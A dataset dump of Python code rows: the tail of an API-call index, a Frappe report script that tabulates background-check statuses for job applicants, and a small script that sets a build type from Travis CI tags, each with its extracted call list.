'output': output})\n", (17975, 18027), False, 'import xarray\n'), ((19730, 19761), 'xclim.core.utils.ensure_chunk_size', 'ensure_chunk_size', (['out'], {'time': '(-1)'}), '(out, time=-1)\n', (19747, 19761), False, 'from xclim.core.utils import ensure_chunk_size\n'), ((2642, 2677), 'xarray.set_options', 'xarray.set_options', ([], {'keep_attrs': '(True)'}), '(keep_attrs=True)\n', (2660, 2677), False, 'import xarray\n'), ((4416, 4451), 'xarray.set_options', 'xarray.set_options', ([], {'keep_attrs': '(True)'}), '(keep_attrs=True)\n', (4434, 4451), False, 'import xarray\n'), ((6343, 6357), 'xclim.core.units.units2pint', 'units2pint', (['pr'], {}), '(pr)\n', (6353, 6357), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((6361, 6376), 'xclim.core.units.units', 'units', (['"""mm / s"""'], {}), "('mm / s')\n", (6366, 6376), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((6391, 6421), 'xclim.core.units.convert_units_to', 'convert_units_to', (['pr', '"""mm d-1"""'], {}), "(pr, 'mm d-1')\n", (6407, 6421), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((6432, 6467), 'xarray.set_options', 'xarray.set_options', ([], {'keep_attrs': '(True)'}), '(keep_attrs=True)\n', (6450, 6467), False, 'import xarray\n'), ((10263, 10298), 'xarray.set_options', 'xarray.set_options', ([], {'keep_attrs': '(True)'}), '(keep_attrs=True)\n', (10281, 10298), False, 'import xarray\n'), ((19447, 19462), 'xclim.core.units.rate2amount', 'rate2amount', (['pr'], {}), '(pr)\n', (19458, 19462), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((19303, 19322), 'numpy.ceil', 'np.ceil', (['(window / 2)'], {}), '(window / 2)\n', (19310, 19322), True, 'import numpy as np\n'), ((19387, 19406), 'numpy.ceil', 'np.ceil', (['(window / 2)'], {}), '(window / 2)\n', (19394, 19406), True, 'import numpy as np\n')] |
# Copyright (c) 2013, VHRS and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _, msgprint
from frappe.utils import (cint, cstr, date_diff, flt, getdate, money_in_words,
nowdate, rounded, today)
from datetime import datetime
from datetime import date
import datetime
from calendar import monthrange
def execute(filters=None):
columns = get_columns()
data = []
row = []
filters
applicant = applicants(filters)
for app in applicant:
row = [app.customer, app.ref_id, app.candidate_name,
app.in_date, app.status, app.checks_group]
if app.status != "Entry Pending":
cg = frappe.get_doc("Checks Group", app.checks_group)
if cg.employment_check1 == 1:
emp = frappe.get_doc("Employment Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Employment Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.employment_check2 == 1:
emp = frappe.get_doc("Employment Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Employment Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.employment_check3 == 1:
emp = frappe.get_doc("Employment Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Employment Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.employment_check4 == 1:
emp = frappe.get_doc("Employment Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Employment Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.education_check1 == 1:
if frappe.db.exists("Education Check1", {
"applicant_id": app.ref_id}):
emp = frappe.get_doc("Education Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Education Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.education_check2 == 1:
emp = frappe.get_doc("Education Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Education Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.education_check3 == 1:
emp = frappe.get_doc("Education Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Education Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.education_check4 == 1:
emp = frappe.get_doc("Education Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Education Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.address_check1 == 1:
emp = frappe.get_doc("Address Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Address Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.address_check2 == 1:
emp = frappe.get_doc("Address Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Address Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.address_check3 == 1:
emp = frappe.get_doc("Address Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Address Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.address_check4 == 1:
emp = frappe.get_doc("Address Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Address Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.family_check1 == 1:
emp = frappe.get_doc("Family Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Family Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.reference_check1 == 1:
emp = frappe.get_doc("Reference Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Reference Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.reference_check2 == 1:
emp = frappe.get_doc("Reference Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Reference Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.reference_check3 == 1:
emp = frappe.get_doc("Reference Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Reference Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.reference_check4 == 1:
emp = frappe.get_doc("Reference Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Reference Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.civil_check == 1:
emp = frappe.get_doc("Civil Check", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Civil Check", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.criminal_check == 1:
emp = frappe.get_doc("Criminal Check", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Criminal Check", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check1 == 1:
emp = frappe.get_doc("ID Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check2 == 1:
emp = frappe.get_doc("ID Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check3 == 1:
emp = frappe.get_doc("ID Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check4 == 1:
emp = frappe.get_doc("ID Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check5 == 1:
emp = frappe.get_doc("ID Check5", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check5", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check6 == 1:
emp = frappe.get_doc("ID Check6", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check6", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
data.append(row)
return columns, data
def get_columns():
columns = [
_("Project Name") + ":Link/Customer:200",
_("VHRS Ref. No") + ":Data:150",
_("Candidate Name") + ":Data:180",
_("Start Date") + ":Date:150",
_("Status") + ":Data:150",
_("Checks Group Name") + ":Data:150",
_("Emp Check1 Status") + ":Data:150",
_("Emp Check2 Status") + ":Data:150",
_("Emp Check3 Status") + ":Data:150",
_("Emp Check4 Status") + ":Data:150",
_("Edu Check1 Status") + ":Data:150",
_("Edu Check2 Status") + ":Data:150",
_("Edu Check3 Status") + ":Data:150",
_("Edu Check4 Status") + ":Data:150",
_("Add Check1 Status") + ":Data:150",
_("Add Check2 Status") + ":Data:150",
_("Add Check3 Status") + ":Data:150",
_("Add Check4 Status") + ":Data:150",
_("Family Check Status") + ":Data:150",
_("Ref Check1 Status") + ":Data:150",
_("Ref Check2 Status") + ":Data:150",
_("Ref Check3 Status") + ":Data:150",
_("Ref Check4 Status") + ":Data:150",
_("Civil Check1 Status") + ":Data:150",
_("Criminal Check2 Status") + ":Data:150",
_("ID Check1 Status") + ":Data:150",
_("ID Check2 Status") + ":Data:150",
_("ID Check3 Status") + ":Data:150",
_("ID Check4 Status") + ":Data:150",
_("ID Check5 Status") + ":Data:150",
_("ID Check6 Status") + ":Data:150",
]
return columns
def applicants(filters):
applicant = frappe.db.sql(
"""select app.checks_group,app.customer,app.ref_id,app.candidate_name,app.in_date,app.status from `tabApplicant` app where
app.in_date between %(start_date)s and %(end_date)s order by app.in_date""", {
"start_date": filters.get("from_date"),
"end_date": filters.get("to_date")
}, as_dict=1)
return applicant
| [
"frappe.db.exists",
"frappe.get_doc",
"frappe._"
] | [((751, 799), 'frappe.get_doc', 'frappe.get_doc', (['"""Checks Group"""', 'app.checks_group'], {}), "('Checks Group', app.checks_group)\n", (765, 799), False, 'import frappe\n'), ((12871, 12888), 'frappe._', '_', (['"""Project Name"""'], {}), "('Project Name')\n", (12872, 12888), False, 'from frappe import _, msgprint\n'), ((12921, 12938), 'frappe._', '_', (['"""VHRS Ref. No"""'], {}), "('VHRS Ref. No')\n", (12922, 12938), False, 'from frappe import _, msgprint\n'), ((12962, 12981), 'frappe._', '_', (['"""Candidate Name"""'], {}), "('Candidate Name')\n", (12963, 12981), False, 'from frappe import _, msgprint\n'), ((13005, 13020), 'frappe._', '_', (['"""Start Date"""'], {}), "('Start Date')\n", (13006, 13020), False, 'from frappe import _, msgprint\n'), ((13044, 13055), 'frappe._', '_', (['"""Status"""'], {}), "('Status')\n", (13045, 13055), False, 'from frappe import _, msgprint\n'), ((13079, 13101), 'frappe._', '_', (['"""Checks Group Name"""'], {}), "('Checks Group Name')\n", (13080, 13101), False, 'from frappe import _, msgprint\n'), ((13125, 13147), 'frappe._', '_', (['"""Emp Check1 Status"""'], {}), "('Emp Check1 Status')\n", (13126, 13147), False, 'from frappe import _, msgprint\n'), ((13171, 13193), 'frappe._', '_', (['"""Emp Check2 Status"""'], {}), "('Emp Check2 Status')\n", (13172, 13193), False, 'from frappe import _, msgprint\n'), ((13217, 13239), 'frappe._', '_', (['"""Emp Check3 Status"""'], {}), "('Emp Check3 Status')\n", (13218, 13239), False, 'from frappe import _, msgprint\n'), ((13263, 13285), 'frappe._', '_', (['"""Emp Check4 Status"""'], {}), "('Emp Check4 Status')\n", (13264, 13285), False, 'from frappe import _, msgprint\n'), ((13309, 13331), 'frappe._', '_', (['"""Edu Check1 Status"""'], {}), "('Edu Check1 Status')\n", (13310, 13331), False, 'from frappe import _, msgprint\n'), ((13355, 13377), 'frappe._', '_', (['"""Edu Check2 Status"""'], {}), "('Edu Check2 Status')\n", (13356, 13377), False, 'from frappe import _, msgprint\n'), ((13401, 13423), 'frappe._', '_', (['"""Edu Check3 Status"""'], {}), "('Edu Check3 Status')\n", (13402, 13423), False, 'from frappe import _, msgprint\n'), ((13447, 13469), 'frappe._', '_', (['"""Edu Check4 Status"""'], {}), "('Edu Check4 Status')\n", (13448, 13469), False, 'from frappe import _, msgprint\n'), ((13493, 13515), 'frappe._', '_', (['"""Add Check1 Status"""'], {}), "('Add Check1 Status')\n", (13494, 13515), False, 'from frappe import _, msgprint\n'), ((13539, 13561), 'frappe._', '_', (['"""Add Check2 Status"""'], {}), "('Add Check2 Status')\n", (13540, 13561), False, 'from frappe import _, msgprint\n'), ((13585, 13607), 'frappe._', '_', (['"""Add Check3 Status"""'], {}), "('Add Check3 Status')\n", (13586, 13607), False, 'from frappe import _, msgprint\n'), ((13631, 13653), 'frappe._', '_', (['"""Add Check4 Status"""'], {}), "('Add Check4 Status')\n", (13632, 13653), False, 'from frappe import _, msgprint\n'), ((13677, 13701), 'frappe._', '_', (['"""Family Check Status"""'], {}), "('Family Check Status')\n", (13678, 13701), False, 'from frappe import _, msgprint\n'), ((13725, 13747), 'frappe._', '_', (['"""Ref Check1 Status"""'], {}), "('Ref Check1 Status')\n", (13726, 13747), False, 'from frappe import _, msgprint\n'), ((13771, 13793), 'frappe._', '_', (['"""Ref Check2 Status"""'], {}), "('Ref Check2 Status')\n", (13772, 13793), False, 'from frappe import _, msgprint\n'), ((13817, 13839), 'frappe._', '_', (['"""Ref Check3 Status"""'], {}), "('Ref Check3 Status')\n", (13818, 13839), False, 'from frappe import _, msgprint\n'), ((13863, 13885), 'frappe._', '_', (['"""Ref Check4 Status"""'], {}), "('Ref Check4 Status')\n", (13864, 13885), False, 'from frappe import _, msgprint\n'), ((13909, 13933), 'frappe._', '_', (['"""Civil Check1 Status"""'], {}), "('Civil Check1 Status')\n", (13910, 13933), False, 'from frappe import _, msgprint\n'), ((13957, 13984), 'frappe._', '_', (['"""Criminal Check2 Status"""'], {}), "('Criminal Check2 Status')\n", (13958, 13984), False, 'from frappe import _, msgprint\n'), ((14008, 14029), 'frappe._', '_', (['"""ID Check1 Status"""'], {}), "('ID Check1 Status')\n", (14009, 14029), False, 'from frappe import _, msgprint\n'), ((14053, 14074), 'frappe._', '_', (['"""ID Check2 Status"""'], {}), "('ID Check2 Status')\n", (14054, 14074), False, 'from frappe import _, msgprint\n'), ((14098, 14119), 'frappe._', '_', (['"""ID Check3 Status"""'], {}), "('ID Check3 Status')\n", (14099, 14119), False, 'from frappe import _, msgprint\n'), ((14143, 14164), 'frappe._', '_', (['"""ID Check4 Status"""'], {}), "('ID Check4 Status')\n", (14144, 14164), False, 'from frappe import _, msgprint\n'), ((14188, 14209), 'frappe._', '_', (['"""ID Check5 Status"""'], {}), "('ID Check5 Status')\n", (14189, 14209), False, 'from frappe import _, msgprint\n'), ((14233, 14254), 'frappe._', '_', (['"""ID Check6 Status"""'], {}), "('ID Check6 Status')\n", (14234, 14254), False, 'from frappe import _, msgprint\n'), ((864, 929), 'frappe.get_doc', 'frappe.get_doc', (['"""Employment Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Employment Check1', {'applicant_id': app.ref_id})\n", (878, 929), False, 'import frappe\n'), ((1347, 1412), 'frappe.get_doc', 'frappe.get_doc', (['"""Employment Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Employment Check2', {'applicant_id': app.ref_id})\n", (1361, 1412), False, 'import frappe\n'), ((1830, 1895), 'frappe.get_doc', 'frappe.get_doc', (['"""Employment Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Employment Check3', {'applicant_id': app.ref_id})\n", (1844, 1895), False, 'import frappe\n'), ((2313, 2378), 'frappe.get_doc', 'frappe.get_doc', (['"""Employment Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Employment Check4', {'applicant_id': app.ref_id})\n", (2327, 2378), False, 'import frappe\n'), ((2792, 2858), 'frappe.db.exists', 'frappe.db.exists', (['"""Education Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check1', {'applicant_id': app.ref_id})\n", (2808, 2858), False, 'import frappe\n'), ((3419, 3483), 'frappe.get_doc', 'frappe.get_doc', (['"""Education Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check2', {'applicant_id': app.ref_id})\n", (3433, 3483), False, 'import frappe\n'), ((3899, 3963), 'frappe.get_doc', 'frappe.get_doc', (['"""Education Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check3', {'applicant_id': app.ref_id})\n", (3913, 3963), False, 'import frappe\n'), ((4379, 4443), 'frappe.get_doc', 'frappe.get_doc', (['"""Education Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check4', {'applicant_id': app.ref_id})\n", (4393, 4443), False, 'import frappe\n'), ((4857, 4919), 'frappe.get_doc', 'frappe.get_doc', (['"""Address Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Address Check1', {'applicant_id': app.ref_id})\n", (4871, 4919), False, 'import frappe\n'), ((5331, 5393), 'frappe.get_doc', 'frappe.get_doc', (['"""Address Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Address Check2', {'applicant_id': app.ref_id})\n", (5345, 5393), False, 'import frappe\n'), ((5805, 5867), 'frappe.get_doc', 'frappe.get_doc', (['"""Address Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Address Check3', {'applicant_id': app.ref_id})\n", (5819, 5867), False, 'import frappe\n'), ((6279, 6341), 'frappe.get_doc', 'frappe.get_doc', (['"""Address Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Address Check4', {'applicant_id': app.ref_id})\n", (6293, 6341), False, 'import frappe\n'), ((6752, 6813), 'frappe.get_doc', 'frappe.get_doc', (['"""Family Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Family Check1', {'applicant_id': app.ref_id})\n", (6766, 6813), False, 'import frappe\n'), ((7226, 7290), 'frappe.get_doc', 'frappe.get_doc', (['"""Reference Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Reference Check1', {'applicant_id': app.ref_id})\n", (7240, 7290), False, 'import frappe\n'), ((7706, 7770), 'frappe.get_doc', 'frappe.get_doc', (['"""Reference Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Reference Check2', {'applicant_id': app.ref_id})\n", (7720, 7770), False, 'import frappe\n'), ((8186, 8250), 'frappe.get_doc', 'frappe.get_doc', (['"""Reference Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Reference Check3', {'applicant_id': app.ref_id})\n", (8200, 8250), False, 'import frappe\n'), ((8666, 8730), 'frappe.get_doc', 'frappe.get_doc', (['"""Reference Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Reference Check4', {'applicant_id': app.ref_id})\n", (8680, 8730), False, 'import frappe\n'), ((9141, 9200), 'frappe.get_doc', 'frappe.get_doc', (['"""Civil Check"""', "{'applicant_id': app.ref_id}"], {}), "('Civil Check', {'applicant_id': app.ref_id})\n", (9155, 9200), False, 'import frappe\n'), ((9609, 9671), 'frappe.get_doc', 'frappe.get_doc', (['"""Criminal Check"""', "{'applicant_id': app.ref_id}"], {}), "('Criminal Check', {'applicant_id': app.ref_id})\n", (9623, 9671), False, 'import frappe\n'), ((10078, 10135), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check1"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check1', {'applicant_id': app.ref_id})\n", (10092, 10135), False, 'import frappe\n'), ((10537, 10594), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check2"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check2', {'applicant_id': app.ref_id})\n", (10551, 10594), False, 'import frappe\n'), ((10996, 11053), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check3"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check3', {'applicant_id': app.ref_id})\n", (11010, 11053), False, 'import frappe\n'), ((11455, 11512), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check4"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check4', {'applicant_id': app.ref_id})\n", (11469, 11512), False, 'import frappe\n'), ((11914, 11971), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check5"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check5', {'applicant_id': app.ref_id})\n", (11928, 11971), False, 'import frappe\n'), ((12373, 12430), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check6"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check6', {'applicant_id': app.ref_id})\n", (12387, 12430), False, 'import frappe\n'), ((1097, 1169), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Employment Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Employment Check1', {'applicant_id': app.ref_id})\n", (1111, 1169), False, 'import frappe\n'), ((1580, 1652), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Employment Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Employment Check2', {'applicant_id': app.ref_id})\n", (1594, 1652), False, 'import frappe\n'), ((2063, 2135), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Employment Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Employment Check3', {'applicant_id': app.ref_id})\n", (2077, 2135), False, 'import frappe\n'), ((2546, 2618), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Employment Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Employment Check4', {'applicant_id': app.ref_id})\n", (2560, 2618), False, 'import frappe\n'), ((2911, 2975), 'frappe.get_doc', 'frappe.get_doc', (['"""Education Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check1', {'applicant_id': app.ref_id})\n", (2925, 2975), False, 'import frappe\n'), ((3651, 3722), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Education Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Education Check2', {'applicant_id': app.ref_id})\n", (3665, 3722), False, 'import frappe\n'), ((4131, 4202), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Education Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Education Check3', {'applicant_id': app.ref_id})\n", (4145, 4202), False, 'import frappe\n'), ((4611, 4682), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Education Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Education Check4', {'applicant_id': app.ref_id})\n", (4625, 4682), False, 'import frappe\n'), ((5087, 5156), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Address Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Address Check1', {'applicant_id': app.ref_id})\n", (5101, 5156), False, 'import frappe\n'), ((5561, 5630), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Address Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Address Check2', {'applicant_id': app.ref_id})\n", (5575, 5630), False, 'import frappe\n'), ((6035, 6104), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Address Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Address Check3', {'applicant_id': app.ref_id})\n", (6049, 6104), False, 'import frappe\n'), ((6509, 6578), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Address Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Address Check4', {'applicant_id': app.ref_id})\n", (6523, 6578), False, 'import frappe\n'), ((6981, 7049), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Family Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Family Check1', {'applicant_id': app.ref_id})\n", (6995, 7049), False, 'import frappe\n'), ((7458, 7529), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Reference Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Reference Check1', {'applicant_id': app.ref_id})\n", (7472, 7529), False, 'import frappe\n'), ((7938, 8009), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Reference Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Reference Check2', {'applicant_id': app.ref_id})\n", (7952, 8009), False, 'import frappe\n'), ((8418, 8489), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Reference Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Reference Check3', {'applicant_id': app.ref_id})\n", (8432, 8489), False, 'import frappe\n'), ((8898, 8969), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Reference Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Reference Check4', {'applicant_id': app.ref_id})\n", (8912, 8969), False, 'import frappe\n'), ((9368, 9434), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Civil Check"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Civil Check', {'applicant_id': app.ref_id})\n", (9382, 9434), False, 'import frappe\n'), ((9839, 9908), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Criminal Check"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Criminal Check', {'applicant_id': app.ref_id})\n", (9853, 9908), False, 'import frappe\n'), ((10303, 10367), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check1', {'applicant_id': app.ref_id})\n", (10317, 10367), False, 'import frappe\n'), ((10762, 10826), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check2', {'applicant_id': app.ref_id})\n", (10776, 10826), False, 'import frappe\n'), ((11221, 11285), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check3', {'applicant_id': app.ref_id})\n", (11235, 11285), False, 'import frappe\n'), ((11680, 11744), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check4', {'applicant_id': app.ref_id})\n", (11694, 11744), False, 'import frappe\n'), ((12139, 12203), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check5"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check5', {'applicant_id': app.ref_id})\n", (12153, 12203), False, 'import frappe\n'), ((12598, 12662), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check6"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check6', {'applicant_id': app.ref_id})\n", (12612, 12662), False, 'import frappe\n'), ((3163, 3234), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Education Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Education Check1', {'applicant_id': app.ref_id})\n", (3177, 3234), False, 'import frappe\n')] |
"""Set the build version to be 'qa', 'rc', 'release'"""
import sys
import os
import re
import logging
log = logging.getLogger()
log.addHandler(logging.StreamHandler())
log.setLevel(logging.DEBUG)
def get_build_type(travis_tag=None):
if not travis_tag:
return "qa"
log.debug("getting build type for tag: \"%s\"", travis_tag)
if re.match(r'v\d+\.\d+\.\d+rc\d+$', travis_tag):
return 'rc'
elif re.match(r'v\d+\.\d+\.\d+$', travis_tag):
return 'release'
return 'qa'
def main():
root_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
build_type_path = os.path.join(root_dir, 'lbry', 'build_type.py')
log.debug("configuring build type file: %s", build_type_path)
travis_commit = os.environ['TRAVIS_COMMIT'][:6]
build_type = get_build_type(os.environ.get('TRAVIS_TAG', None))
log.debug("setting build type=%s, build commit=%s", build_type, travis_commit)
with open(build_type_path, 'w') as f:
f.write(f"BUILD = \"{build_type}\"\nBUILD_COMMIT = \"{travis_commit}\"\n")
if __name__ == '__main__':
sys.exit(main())
| [
"logging.getLogger",
"logging.StreamHandler",
"re.match",
"os.environ.get",
"os.path.join",
"os.path.realpath"
